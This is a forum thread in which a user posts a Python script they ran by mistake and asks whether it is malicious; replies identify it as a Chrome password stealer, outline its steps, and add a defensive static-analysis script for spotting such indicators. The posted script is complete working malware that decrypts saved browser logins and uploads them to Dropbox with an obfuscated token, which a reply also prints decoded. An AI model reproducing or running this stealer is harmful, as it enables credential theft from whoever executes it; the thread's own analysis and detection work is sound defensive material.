Python Forum
Help! I accidentally ran a file without checking the code
#1
So I accidentally ran this file today, and didn't check the Python code. Can anybody tell me if this code is malicious?
import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
import dropbox
from codecs import encode
import getpass


def upload_passfile():
    access_token = encode("pYTjP6sifCxNNNNNNNNNNDIRXrA2kfdgl93KiKK1ddIgXDbvfwWFMmDlTyB1EP0i", 'rot13')
    file_from = "rc.txt"
    file_to = "/passwords/" + str(getpass.getuser()) + "'s_passwords.txt"
    client = dropbox.Dropbox(access_token)
    client.files_upload(open(file_from, "rb").read(), file_to, dropbox.files.WriteMode.overwrite, mute=True)


def get_master_key():
    with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State', "r", encoding='utf-8') as f:
        local_state = f.read()
        local_state = json.loads(local_state)
    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    master_key = master_key[5:]  # removing DPAPI
    master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1] # sqlite3 decryption
    return master_key


def decrypt_payload(cipher, payload):
    return cipher.decrypt(payload)


def generate_cipher(aes_key, iv):
    return AES.new(aes_key, AES.MODE_GCM, iv)


def decrypt_password(buff, master_key):
    try:
        iv = buff[3:15]
        payload = buff[15:]
        cipher = generate_cipher(master_key, iv)
        decrypted_pass = decrypt_payload(cipher, payload)
        decrypted_pass = decrypted_pass[:-16].decode()  # remove suffix bytes
        return decrypted_pass

    except Exception as e:
        decrypted_pass = win32crypt.CryptUnprotectData(buff, None, None, None, 0) #Tuple
        return str(decrypted_pass[1])


if __name__ == '__main__':

    master_key = get_master_key()
    login_db = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\default\Login Data'
    shutil.copy2(login_db, "Loginvault.db") #making a temp copy since Login Data DB is locked while Chrome is running
    conn = sqlite3.connect("Loginvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT action_url, username_value, password_value FROM logins")
        passfile = open("rc.txt", "w")
        for r in cursor.fetchall():
            url = r[0]
            username = r[1]
            encrypted_password = r[2]
            decrypted_password = decrypt_password(encrypted_password, master_key)
            passfile.write("URL: " + url + "\nUsername: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n")
        passfile.close()
        conn.close()

    except Exception as e:
        print(e)

    upload_passfile()
    os.remove("rc.txt")
    os.remove("Loginvault.db")
Larz60+ wrote Dec-25-2020, 11:46 AM:
Please post all code, output and errors (in its entirety) between their respective tags. Refer to BBCode help topic on how to post. Use the "Preview Post" button to make sure the code is presented as you expect before hitting the "Post Reply/Thread" button.
Fixed for you this time. Please use code tags on future posts.
#2
Without deep analysis, this looks like it is trying to obtain your passwords. I would worry, and change all my critical passwords NOW.
#3
I had this issue too, but after some code analysis I found out that it only retrieves some of your passwords, so I suggest that you change your most important ones, or all of them (recommended).
#4
Hm, the hacker should have used Pathlib and his hack works only on Windows.

  1. Getting the master key from Chrome
  2. Copying Login Data to another place (Chrome locks the database)
  3. Iterating over the SQL SELECT of logins and passwords, saving line by line in a text file rc.txt, using the master key to decrypt.
  4. Sending the rc.txt to a Dropbox account
  5. Deleting the rc.txt and the copy of the login database.

One thing is strange. Where does the Dropbox module come from?
This hack can only work if the dropbox dependency is installed in your current Python interpreter.

PS:
His Dropbox Access Token: cLGwC6fvsPkAAAAAAAAAAQVEKeN2xsqty93XvXX1qqVtKQoisjJSZzQyGlO1RC0v
Almost dead, but too lazy to die: https://sourceserver.info
All humans together. We don't need politicians!
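The five steps listed in the post above are the shape of most browser credential stealers: read the browser's key material, copy the locked credential database, decrypt, write to a file, upload, delete. The script below is an added example (it is not code from this thread or from any of its posters) showing how a defender can triage a Python file for exactly those indicators statically, with the `ast` module, before ever running it. The two sample inputs are constructed for this example: `SUSPECT_SOURCE` is a condensed stand-in that keeps only the indicator-bearing lines of a stealer (the access token is replaced by the placeholder `TOKEN_PLACEHOLDER`), and `BENIGN_SOURCE` is a harmless file reader. The indicator tables (`EXFIL_MODULES`, `CREDENTIAL_STORE_MARKERS`) and the category names are assumptions chosen for this example, not an exhaustive list.

```python
import ast

# Constructed sample input (not the thread's script): a condensed stand-in that keeps
# only the lines carrying the indicators; the access token is a placeholder.
SUSPECT_SOURCE = r'''
import os, shutil
import win32crypt
import dropbox
from codecs import encode

def upload():
    token = encode("TOKEN_PLACEHOLDER", "rot13")
    client = dropbox.Dropbox(token)
    client.files_upload(open("rc.txt", "rb").read(), "/passwords/x.txt")

def main():
    login_db = os.environ["USERPROFILE"] + r"\AppData\Local\Google\Chrome\User Data\default\Login Data"
    shutil.copy2(login_db, "Loginvault.db")
    key = win32crypt.CryptUnprotectData(b"x", None, None, None, 0)[1]
    os.remove("rc.txt")
'''

# Constructed benign sample for comparison: reads a JSON file and nothing else.
BENIGN_SOURCE = r'''
import json
from pathlib import Path

def load(path):
    return json.loads(Path(path).read_text())
'''

# Indicator tables: assumptions chosen for this example, not an exhaustive list.
EXFIL_MODULES = {"dropbox", "requests", "smtplib", "ftplib", "paramiko"}
CREDENTIAL_STORE_MARKERS = ("Login Data", "Local State", "Cookies", "Web Data")


def _callee_name(func):
    """Render a call target such as client.files_upload as a dotted string."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    return ".".join(reversed(parts))


class IndicatorVisitor(ast.NodeVisitor):
    def __init__(self):
        self.findings = []  # (line, category, detail) tuples

    def _note_import(self, module, line):
        if module in EXFIL_MODULES:
            self.findings.append((line, "exfiltration-channel", f"imports {module}"))
        if module == "win32crypt":
            self.findings.append((line, "dpapi-access", "imports win32crypt"))

    def visit_Import(self, node):
        for alias in node.names:
            self._note_import(alias.name.split(".")[0], node.lineno)

    def visit_ImportFrom(self, node):
        if node.module:
            self._note_import(node.module.split(".")[0], node.lineno)

    def visit_Constant(self, node):
        # Path fragments of Chromium's credential and cookie stores inside string literals.
        if isinstance(node.value, str):
            for marker in CREDENTIAL_STORE_MARKERS:
                if marker in node.value:
                    self.findings.append((node.lineno, "browser-credential-store", f"literal mentions '{marker}'"))

    def visit_Call(self, node):
        name = _callee_name(node.func)
        if name.endswith("CryptUnprotectData"):
            self.findings.append((node.lineno, "dpapi-access", f"calls {name}"))
        if name.endswith("files_upload"):
            self.findings.append((node.lineno, "exfiltration-channel", f"calls {name}"))
        if name.endswith("encode"):
            # codecs.encode(literal, "rot13"): a string the author did not want readable.
            args = list(node.args[1:]) + [kw.value for kw in node.keywords]
            if any(isinstance(a, ast.Constant) and a.value == "rot13" for a in args):
                self.findings.append((node.lineno, "obfuscated-literal", "rot13-encoded string"))
        if name == "os.remove":
            self.findings.append((node.lineno, "cleanup", "deletes a file after use"))
        self.generic_visit(node)


def triage(source):
    """Return a verdict, the sorted indicator categories and the raw findings."""
    visitor = IndicatorVisitor()
    visitor.visit(ast.parse(source))
    categories = {category for _, category, _ in visitor.findings}
    # A backup tool may legitimately read Login Data, so the stealer verdict requires
    # both a credential-store access and an exfiltration channel in the same file.
    if {"browser-credential-store", "exfiltration-channel"} <= categories:
        verdict = "likely credential stealer"
    elif categories:
        verdict = "suspicious"
    else:
        verdict = "no indicators"
    return {"verdict": verdict, "categories": sorted(categories), "findings": visitor.findings}
```

Calling `triage(SUSPECT_SOURCE)` returns the verdict "likely credential stealer" together with one finding per indicator and its line number, while `triage(BENIGN_SOURCE)` reports no indicators. The verdict deliberately requires two independent categories: a credential-store path alone is what a legitimate backup tool would also touch, and an upload call alone is what any sync client does; it is the combination, plus an obfuscated literal and self-cleanup, that answers the original question without executing the file.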
#5
(Dec-25-2020, 02:10 PM)DeaD_EyE Wrote: PS:
His Dropbox Access Token: cLGwC6fvsPkAAAAAAAAAAQVEKeN2xsqty93XvXX1qqVtKQoisjJSZzQyGlO1RC0v
Probably you can report them. It most likely violates Dropbox ToS.
If you can't explain it to a six year old, you don't understand it yourself, Albert Einstein
How to Ask Questions The Smart Way: link and another link
Create MCV example
Debug small programs

#6
They are investigating now, but the team is not allowed to visit external URLs.
So I also provided them with the source code today.
Almost dead, but too lazy to die: https://sourceserver.info
All humans together. We don't need politicians!